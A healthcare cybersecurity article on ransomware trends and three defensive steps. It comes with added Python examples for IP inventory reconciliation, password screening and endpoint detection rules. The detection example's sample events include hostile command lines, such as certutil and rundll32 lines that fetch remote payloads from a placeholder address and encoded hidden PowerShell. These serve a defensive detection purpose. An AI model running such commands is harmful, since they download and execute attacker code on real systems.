Attacks against healthcare providers are increasing in severity, with hackers demanding multiple ransomware payments.
In December, the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) released a joint advisory warning several industries, including healthcare, that threat actors using Cuba ransomware had infiltrated hundreds of companies.
The ransomware was first observed in November 2019, but activity accelerated after December 2021: the number of compromised entities doubled between December 2021 and August 2022. Globally, Cuba ransomware actors had compromised roughly 100 organizations and collected more than $60 million in ransom payments.
Just as healthcare is dynamic, so are the cyber threats facing organizations. New threat vectors pop up regularly, requiring vigilance in monitoring IT infrastructure, evaluating anomalies, and remediating any discovered weaknesses. Each staff member, device, technology connection, API, and third-party vendor or business associate increases your organizational risk.
Unfortunately, attacks against healthcare providers are increasing in severity, with hackers demanding multiple ransom payments, failing to restore access after payment, publishing stolen data for extortion, or destroying data simply because they can.
In September, the FBI outlined three attacks against healthcare organizations that netted more than $4.6 million in ill-gotten gains. The agency said hackers used multiple methods — including publicly available personal details, social engineering, phishing, and spoofing support centers — to impersonate victims and gain access to banking details. In two instances, hackers used credentials from a healthcare company to shift the direct deposit details of a hospital to an account they controlled, stealing $3.8 million. In another, an impersonator was able to change Automated Clearing House (ACH) instructions to swindle another company out of $840,000.
These are but a few examples of the internal and external threats hospital and health system IT teams deal with daily. IT departments are often cost-constrained and forced to choose among equally important cybersecurity initiatives. Cybersecurity is often considered a cost center because it doesn't directly benefit patients. However, breaches too often prevent hospitals from delivering care, diverting patients to other facilities or delaying care for others.
But safeguards exist that can deny bad actors the three capabilities they need to conduct a successful breach: visibility into a target system, the ability to interact with the target, and the ability to execute on that interaction. Understanding the potential threats and taking the following three proactive steps can help secure your networks.
1. Know your (IP) range
Your IT systems are under constant scrutiny, whether by search engines crawling your sites to build their indexes, or by your internet service provider checking which ports are open so it can manage its own security or block improper outbound traffic. These scans return basic information about the operating systems in use, the web server and application software behind your sites, and more.
But bad actors may also be scanning your network, probing for vulnerabilities. The key to controlling visibility is understanding your IP space, your perimeter, your systems, and your potential weak spots. We've had clients request penetration testing who didn't know their IP ranges, which is critical information they should be able to access easily. Automate the discovery of your external footprint, and compare what the internet can see against what you think you own, so that threat management becomes a routine reconciliation rather than a one-off audit.
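The reconciliation described above, as an added example that is not from the original article: a known-range inventory (which CIDR blocks the organization owns and which ports each is expected to expose) is compared against what an external scan reports. Hosts that fall outside every known range are flagged as unknown assets, and known hosts exposing ports they should not are flagged as unexpected. The inventory, the scan results and the IP addresses are all constructed for illustration.

```python
"""Reconcile an external scan against a known IP-range inventory.

Added example, not from the original article. The inventory, the
scan results and the expected-port policy below are constructed
for illustration (documentation-only address blocks).
"""
import ipaddress
from collections import defaultdict

# Constructed inventory: the CIDR blocks the organization owns and the
# ports each block is expected to expose to the internet.
INVENTORY = {
    "198.51.100.0/26": {"owner": "Hospital DMZ", "allowed_ports": {443}},
    "203.0.113.0/27": {"owner": "Patient portal", "allowed_ports": {80, 443}},
}

# Constructed scan results: (ip, open_port) pairs as an external scanner
# or an internet-wide search service might report them.
SCAN_RESULTS = [
    ("198.51.100.10", 443),
    ("198.51.100.10", 3389),   # RDP exposed in the DMZ: not allowed
    ("203.0.113.5", 443),
    ("203.0.113.5", 80),
    ("192.0.2.77", 22),        # host outside every known range
    ("192.0.2.77", 8080),
]


def load_ranges(inventory):
    """Parse CIDR strings once; raises ValueError on malformed entries."""
    return {ipaddress.ip_network(cidr, strict=True): meta
            for cidr, meta in inventory.items()}


def find_range(ip, ranges):
    """Return (network, meta) for the most specific range containing ip, or None."""
    addr = ipaddress.ip_address(ip)
    matches = [(net, meta) for net, meta in ranges.items() if addr in net]
    if not matches:
        return None
    # Longest prefix wins when ranges nest.
    return max(matches, key=lambda m: m[0].prefixlen)


def reconcile(scan_results, inventory):
    """Classify each observed (ip, port) as expected, unexpected port, or unknown host.

    Returns a dict with three lists so the result can feed a ticket queue or a test.
    """
    ranges = load_ranges(inventory)
    report = {"expected": [], "unexpected_port": [], "unknown_host": []}
    for ip, port in scan_results:
        hit = find_range(ip, ranges)
        if hit is None:
            report["unknown_host"].append((ip, port))
            continue
        _net, meta = hit
        if port in meta["allowed_ports"]:
            report["expected"].append((ip, port))
        else:
            report["unexpected_port"].append((ip, port, meta["owner"]))
    return report


def summarize(report):
    """Group the findings that need follow-up by host."""
    by_host = defaultdict(list)
    for entry in report["unexpected_port"] + report["unknown_host"]:
        by_host[entry[0]].append(entry[1])
    return dict(by_host)


if __name__ == "__main__":
    result = reconcile(SCAN_RESULTS, INVENTORY)
    for kind, items in result.items():
        print(f"{kind}: {items}")
    print("hosts needing follow-up:", summarize(result))
```

Run it on a schedule with real scan output and the inventory becomes a living document: an "unknown host" finding is either shadow IT or a stale inventory, and both are worth a ticket.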
2. Manage password strength
The simplest path into your systems is through a compromised password. Even in organizations using single sign-on (SSO), password policies are often poorly implemented and enforced, allowing users to select common words and phrases that attackers can guess or crack quickly.
In addition to requiring longer passwords, consider banning the names of local sports teams, the organization itself, and other terms common in your locale; a screening list of this kind blocks the guesses an attacker tries first, which is why NIST SP 800-63B recommends checking candidates against known-bad lists rather than relying on composition rules alone. Where possible, prevent reuse of the same password across systems and accounts. Multi-factor authentication, when deployed fully and properly, provides additional protection against logins with a stolen or guessed password.
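A screening check that enforces the advice above, as an added example that is not from the original article: a minimum length, a banned-term list that still catches leet-speak and suffixed variants such as "Br0nc0s2023!", and a reuse check against the user's stored password history. The banned terms, the history entries and the sample passwords are constructed; the scrypt parameters are illustrative, not a recommendation for any particular product.

```python
"""Screen a candidate password against length, banned local terms and reuse.

Added example, not from the original article. The banned-term list,
the stored history and the sample passwords are constructed.
"""
import hashlib
import hmac
import os
import re

MIN_LENGTH = 14

# Constructed banned list: local sports teams, the organization's own name,
# and a few terms that appear constantly in credential dumps.
BANNED_TERMS = ["broncos", "rockies", "nuggets", "mercyhospital", "password", "welcome"]

# Undo common leet substitutions so "Br0nc0s!" normalizes to "broncos".
_LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s", "7": "t",
                       "@": "a", "$": "s"})


def normalize(password):
    """Lower-case, reverse leet substitutions and drop non-letters for term matching."""
    folded = password.lower().translate(_LEET)
    return re.sub(r"[^a-z]", "", folded)


def hash_password(password, salt=None):
    """Salted scrypt hash for the history store; returns (salt, digest)."""
    salt = salt or os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1, dklen=32)
    return salt, digest


def was_used_before(password, history):
    """True if password matches any (salt, digest) pair previously stored for this user."""
    for salt, digest in history:
        _, candidate = hash_password(password, salt)
        if hmac.compare_digest(candidate, digest):
            return True
    return False


def check_password(password, history=(), banned=BANNED_TERMS):
    """Return a list of policy violations; an empty list means the password is acceptable."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    norm = normalize(password)
    for term in banned:
        if term in norm:
            problems.append(f"contains banned term '{term}'")
    if was_used_before(password, history):
        problems.append("reused from password history")
    return problems


if __name__ == "__main__":
    previous = [hash_password("Winter-Is-Coming-2024")]
    for candidate in ["Br0nc0s2023!", "Winter-Is-Coming-2024", "correct horse battery staple 99"]:
        print(repr(candidate), "->", check_password(candidate, previous) or "ok")
```

Normalizing before matching is the point of the example: a plain substring check on the raw password would miss the very variants users reach for when a team name is banned.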
3. Implement endpoint detection and response
Finally, organizations need to thwart a hacker’s ability to execute malicious software or actions within their network.
Many organizations still deploy traditional antivirus software, which does a fine job removing known malware but does little against what's known as "living off the land." In this approach, criminals gain access and then operate with the tools already present on your systems, such as PowerShell, WMI, remote administration utilities, and built-in Windows binaries, so that no unfamiliar file is ever written for a signature scanner to catch. Rather than making a big, noticeable scene by immediately launching malware or locking up data, they remain in stealth mode, moving through your network and stealing as much information as they can for as long as they can. Then, just before they're caught or when they think they have all they can get, they cause a big scene by launching malware or ransomware.
To be truly effective in thwarting attacks, healthcare organizations need to detect behavior, not just files: which process launched which, with what command line, and what it connected to. Endpoint detection and response (EDR) software records that activity on every endpoint and applies behavioral rules to it, so it can flag an attacker's misuse of a legitimate tool, quarantine what it finds, and sever the network connections of machines that have been accessed in an unauthorized manner. That combination of visibility and response is why EDR is growing in popularity.
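The kind of behavioral rule the two paragraphs above describe, as an added example that is neither from the original article nor any EDR product's rule set: a handful of detections run over process-creation events, keyed on the combination of parent process, image and command line, followed by a list of hosts whose high-severity hits make them candidates for isolation. The events are constructed; the field names follow the usual parent/image/command-line shape of endpoint telemetry (Sysmon event ID 1 or an EDR sensor), and the rule names and severities are the example's own.

```python
"""Flag living-off-the-land patterns in process-creation events.

Added example, not from the original article and not any EDR product's
rule set. The events below are constructed; the hosts, addresses and
command lines are illustrative only.
"""
import re

# Constructed events: one dict per process start, as an EDR sensor or
# Sysmon event ID 1 would record them.
EVENTS = [
    {"host": "ws-nurse-07", "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"host": "ws-nurse-07", "parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.9/a.txt C:\\Users\\Public\\a.exe"},
    {"host": "srv-pacs-01", "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"host": "ws-admin-02", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\inventory.ps1"},
    {"host": "srv-file-03", "parent": "wmiprvse.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c whoami /all"},
    {"host": "srv-file-03", "parent": "cmd.exe", "image": "rundll32.exe",
     "cmdline": "rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";"
                "GetObject(\"script:http://203.0.113.9/x.sct\")"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# PowerShell accepts unambiguous prefixes of its switches, so match the
# short forms too (-e, -ec, -enc, -encodedcommand; -w hidden, -win hidden).
ENCODED_SWITCH = re.compile(r"(?i)\s-e(c|nc(odedcommand)?)?\b")
HIDDEN_WINDOW = re.compile(r"(?i)\s-w[a-z]*\s+hidden\b")
CERTUTIL_FETCH = re.compile(r"(?i)-urlcache\b.*https?://")
SCRIPT_PROTOCOL = re.compile(r"(?i)(javascript|vbscript):")

# Each rule: (name, severity, predicate). The predicates combine parent,
# image and command line, which is what separates an attacker's use of a
# built-in tool from an administrator's.
RULES = [
    ("office_spawns_shell", "high",
     lambda e: e["parent"] in OFFICE_APPS and e["image"] in SHELLS),
    ("powershell_encoded_hidden", "high",
     lambda e: e["image"] == "powershell.exe"
     and ENCODED_SWITCH.search(e["cmdline"]) and HIDDEN_WINDOW.search(e["cmdline"])),
    ("certutil_download", "high",
     lambda e: e["image"] == "certutil.exe" and CERTUTIL_FETCH.search(e["cmdline"])),
    ("wmi_spawns_shell", "medium",
     lambda e: e["parent"] == "wmiprvse.exe" and e["image"] in SHELLS),
    ("rundll32_script", "high",
     lambda e: e["image"] == "rundll32.exe" and SCRIPT_PROTOCOL.search(e["cmdline"])),
]


def evaluate(event, rules=RULES):
    """Return the names of all rules an event matches."""
    return [name for name, _, pred in rules if pred(event)]


def detect(events, rules=RULES):
    """Run every rule over every event; return (host, image, rule, severity) hits."""
    severity = {name: sev for name, sev, _ in rules}
    hits = []
    for event in events:
        for name in evaluate(event, rules):
            hits.append((event["host"], event["image"], name, severity[name]))
    return hits


def hosts_to_isolate(hits, level="high"):
    """Hosts with at least one hit at the given severity: candidates for network isolation."""
    return sorted({host for host, _, _, sev in hits if sev == level})


if __name__ == "__main__":
    found = detect(EVENTS)
    for hit in found:
        print(hit)
    print("isolate:", hosts_to_isolate(found))
```

Note what the rules do not fire on: the administrator's `powershell.exe -File inventory.ps1` launched from Explorer and the ordinary `svchost.exe` service host are left alone. A signature scanner sees the same `powershell.exe` binary in the benign and the malicious event; only the parent and the command line tell them apart.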
Hospitals and health systems make investments every day to improve their facilities, upgrade equipment, and invest in new technologies to enhance patient diagnosis and treatment. Similarly, investing in IT infrastructure is critical to protecting hospital networks, systems, and software, and for maintaining care delivery.
TJ Ramsey is director of threat assessment operations for Fortified Health Security. The company recently released the “2023 Horizon Report” on the state of cybersecurity in healthcare.